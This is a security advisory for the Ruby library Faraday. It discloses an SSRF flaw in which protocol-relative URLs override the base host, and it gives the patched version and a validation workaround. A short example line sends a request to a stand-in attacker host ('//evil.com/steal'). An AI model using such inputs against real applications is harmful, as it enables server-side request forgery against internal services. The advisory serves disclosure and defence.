GHSA-33mh-2634-fwr2
Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url
Details
### Impact
Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component.
This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF).
The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely.
**Example:** ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal') # Request is sent to https://evil.com/steal instead of api.internal.com ```
### Patches
Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.
### Workarounds
**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.**
Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically:
- Reject or strip input that starts with // followed by a non-/ character - Use an allowlist of permitted path prefixes - Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday
Example validation: ```ruby def safe_path(user_input) raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]}) user_input end ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2026-25765 [ADVISORY]
- https://github.com/lostisland/faraday/pull/1569 [WEB]
- https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc [WEB]
- https://github.com/lostisland/faraday [PACKAGE]
- https://github.com/lostisland/faraday/releases/tag/v1.10.5 [WEB]
- https://github.com/lostisland/faraday/releases/tag/v2.14.1 [WEB]
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml [WEB]
- https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2 [WEB]
- https://www.rfc-editor.org/rfc/rfc3986#section-5.4 [WEB]